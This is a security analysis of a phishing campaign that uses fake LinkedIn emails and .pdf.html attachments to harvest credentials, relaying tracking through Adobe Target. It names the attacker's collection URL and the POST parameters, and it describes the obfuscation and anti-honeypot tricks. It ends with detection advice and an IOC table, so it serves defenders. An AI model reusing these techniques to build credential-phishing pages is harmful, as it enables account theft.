Fake LinkedIn Emails Abuse Adobe Target to Track and Steal Login Credentials
Not every attack begins with a zero-day exploit or a sophisticated payload buried deep in system memory. Sometimes, all an attacker needs is an email that looks professional, an attachment that appears harmless, and the implicit trust users place in familiar names like LinkedIn or Adobe.
A new phishing campaign discovered and published by researchers in late May 2026 is a textbook example of how social engineering can be combined with trusted infrastructure abuse to create a simple yet sufficiently sophisticated attack chain capable of bypassing multiple layers of conventional security controls. This is not the kind of attack that requires exceptional technical skill — and that is precisely what makes it dangerous, because it targets the hardest vulnerability to patch in any system: the human element.
Background and Attack Targets
LinkedIn has long been fertile ground for phishing campaigns targeting professionals and enterprises. The platform is synonymous with connection notifications, collaboration invitations, profile review requests, and business proposals — all types of content users may act on without much deliberation.
This campaign exploits exactly that familiarity. The attackers did not need to construct an elaborate scenario or impersonate a high-profile figure. All they needed was an email that looked professional enough, with content framed around a collaboration request or job inquiry. The ultimate objective was the victim's LinkedIn credentials — valuable assets that can be used to escalate further attacks, compromise corporate accounts, or simply be sold on underground marketplaces.
The Phishing Email and Initial Disguise Techniques
Email Content
The phishing email was crafted to resemble a business collaboration request or job proposal originating from a LinkedIn user. The email used professional language, subject matter consistent with a business networking context, and did not contain the glaring spelling errors commonly associated with lower-quality phishing campaigns.
However, closer inspection reveals several inconsistencies: the sender's display name, email address, and signature do not fully align with one another. The company name appearing in the email may be legitimate, but the declared geographic location does not match the company's actual registration details. These are precisely the kinds of signals that users without proper security awareness training are likely to overlook — especially when the email arrives during a busy workday.
The Disguised Attachment
The most notable element of the initial stage is how the attachment was constructed. Rather than using an executable (.exe) file or an Office document with embedded macros — both of which are commonly blocked or flagged by email security systems — the attackers used an HTML file with a double-extension naming convention in the format *.pdf.html.
This technique works by exploiting how operating systems and email clients render filenames. When a filename is long enough, the true extension (.html) may be truncated in the display interface, leaving users to see only the portion containing the word pdf and incorrectly assume the file is a standard PDF document. Even when users can see the full filename, the familiarity of the word "pdf" may be enough to lower their guard.
Part II: The Malicious Code Inside the HTML File
Multi-Layer Obfuscation
The malicious HTML file was not designed to display any real document — it functions entirely as the entry stage of the attack chain. The content inside is heavily obfuscated, serving two primary purposes: concealing the true execution logic from static analysis and neutralizing detection rules based on simple signature matching.
The obfuscation techniques identified in this campaign include URL encoding combined with Base64 encoding, split across multiple separate sections of the source code before being reassembled and executed via JavaScript in the browser. This approach is common but effective, as it requires analysts to manually unpack each layer of obfuscation rather than simply reading through the source code.
The Fake Login Form and a Subtle Technical Detail
When the HTML file is opened in a browser, the victim is presented with a fake LinkedIn login page designed to closely mimic the authentic interface. One technically noteworthy detail: the victim's email address is typically hardcoded directly into the form, meaning the email field is pre-filled and cannot be changed or deleted by the user.
This serves two simultaneous purposes. Psychologically, a pre-filled email field creates the impression of a seamless, legitimate authentication process in progress, nudging the user toward entering their password without hesitation. Technically, it prevents automated security researchers and honeypot systems from freely injecting fake test credentials to probe the form's behavior, thereby reducing the attacker's risk of early detection through automated behavioral analysis systems.
Part III: The Campaign's Defining Technique — Abusing Adobe Target
What Is Adobe Target?
To understand why the abuse of Adobe Target is particularly concerning, it is important to grasp the legitimate role of this service. Adobe Target is a platform within the Adobe Experience Cloud suite, widely used by large enterprises to run content personalization campaigns and A/B testing on their websites.
The service operates through domains such as omtrdc.net, enabling organizations to track user behavior, segment audiences, and deliver different content to different user groups based on predefined conditions. Because this is a legitimate service operated by Adobe — one of the world's most established and trusted enterprise software companies — its associated domains are typically whitelisted in the vast majority of enterprise security systems.
How the Attackers Exploited This Service
The following URL was observed in the victim's network traffic:
https://lnkd.tt.omtrdc.net/rest/v1/delivery
Rather than sending the victim's data directly to a malicious server from the outset, the attackers used this endpoint as an intermediary relay point. Traffic flows through Adobe's infrastructure first, before being further directed according to the logic the attackers had configured.
The purpose of this step is twofold. On one hand, it allows the attackers to precisely track how many victims opened the file, how many interacted with the fake login form, and how many actually entered their passwords — effectively turning Adobe Target into a phishing campaign analytics tool. On the other hand, traffic passing through the omtrdc.net domain is treated as benign by many monitoring systems, helping the attackers extend the operational lifetime of the campaign before being detected and blocked.
This is a clear manifestation of the Living off Trusted Sites (LoTS) tactic — a growing trend in which threat actors prefer to abuse the legitimate infrastructure of cloud services, CDNs, and major platforms rather than building their own dedicated C2 infrastructure.
Part IV: Credential Harvesting and the Final Redirect
The Data Collection Server
After passing through the Adobe obfuscation layer, the victim's credentials are forwarded to their true destination via a POST request to:
http://a1263367.xsph.ru/taam/Ln.php
A .ru domain with a randomly structured subdomain of this type is an unambiguous red flag for domain analysis systems integrated with threat intelligence feeds. The data transmitted includes at least two parameters: parameter AA containing the victim's email address (already embedded from the previous stage), and parameter BB containing the password the user just entered into the fake form.
This is the most rudimentary part of the campaign — a simple PHP script that receives POST requests and logs the data — but it does not need to be more sophisticated, because all the critical heavy lifting has already been performed in the preceding layers.
The "Cover Your Tracks" Redirect Technique
Immediately after harvesting the login credentials, the attacker's server-side PHP script executes one final step: it redirects the victim's browser to the legitimate page business.linkedin.com.
This is a small but deliberately calculated detail. For the vast majority of users, the experience of "entering credentials and being taken to the real LinkedIn page" will be interpreted as a successful login or a routine automatic redirect. This eliminates the victim's immediate motivation to report an incident, while simultaneously creating a valuable window of time during which the attackers can exploit the freshly compromised account before the victim suspects anything at all.
Tactical Assessment and Defensive Perspective
Strengths and Weaknesses of the Campaign
Viewed holistically, this campaign succeeds in weaving together multiple individually minor techniques into a highly cohesive attack chain. From the professional lure email, through the obfuscated double-extension HTML file, to the abuse of Adobe infrastructure as a tracking layer, and concluding with a redirect back to the legitimate site — each step serves a specific purpose in progressively reducing suspicion.
However, the most obvious weakness is the data collection endpoint: a .ru domain with a URL structure that is detectable if DNS and outbound HTTP traffic are properly monitored. Additionally, the fact that each victim's email address is hardcoded into the HTML file implies that each file is a customized version tailored to a specific target — suggesting this is a targeted campaign rather than a broad spray-and-pray spam operation.
Defensive Recommendations
For SOC and Blue Team practitioners, this campaign offers several detection and mitigation directions that can be acted upon immediately:
Email Gateway: Add detection rules for HTML attachments with double-extension naming patterns such as
*.pdf.html,*.docx.html, or similar variants.Endpoint Detection: Monitor browser processes that open HTML files from Downloads or Temp directories, especially when followed immediately by outbound network connections.
DNS / Web Proxy Monitoring: Build alerts for the behavioral chain: local HTML file → connection to
omtrdc.net→ POST to an unknown domain. This sequence is anomalous because regular users do not open HTML files that generate traffic through Adobe Target.Threat Intelligence Integration: Add
a1263367.xsph.ruand the associatedAA/BBPOST parameters to your TIP and SIEM to automatically identify similar patterns going forward.Security Awareness Training: Train users to recognize double-extension files and reinforce the habit of never opening unsolicited email attachments — even when the email appears to originate from LinkedIn.
IOCs
The indicators below can be used for hunting, triage, or enrichment purposes within SIEM/SOAR platforms. Note that static IOCs have a short operational lifespan — the true long-term value of this campaign lies in its TTPs (Tactics, Techniques & Procedures), not in specific indicators alone.
| Loại IOC | Giá Trị |
|---|---|
| Domain bị lạm dụng | lnkd.tt.omtrdc.net |
| URL endpoint | https://lnkd.tt.omtrdc.net/rest/v1/delivery |
| Domain C2 | a1263367.xsph.ru |
| URL C2 | http://a1263367.xsph.ru/taam/Ln.php |
| Tham số POST | AA (email), BB (password) |
| Redirect sau tấn công | business.linkedin.com |
| Mẫu tệp nguy hiểm | *.pdf.html |
| Loại tệp | HTML obfuscated (URL encoding + Base64) |
| Lure theme | Đề nghị hợp tác/trao đổi công việc LinkedIn |
| Kỹ thuật đặc trưng | Hardcode email nạn nhân vào form HTML |
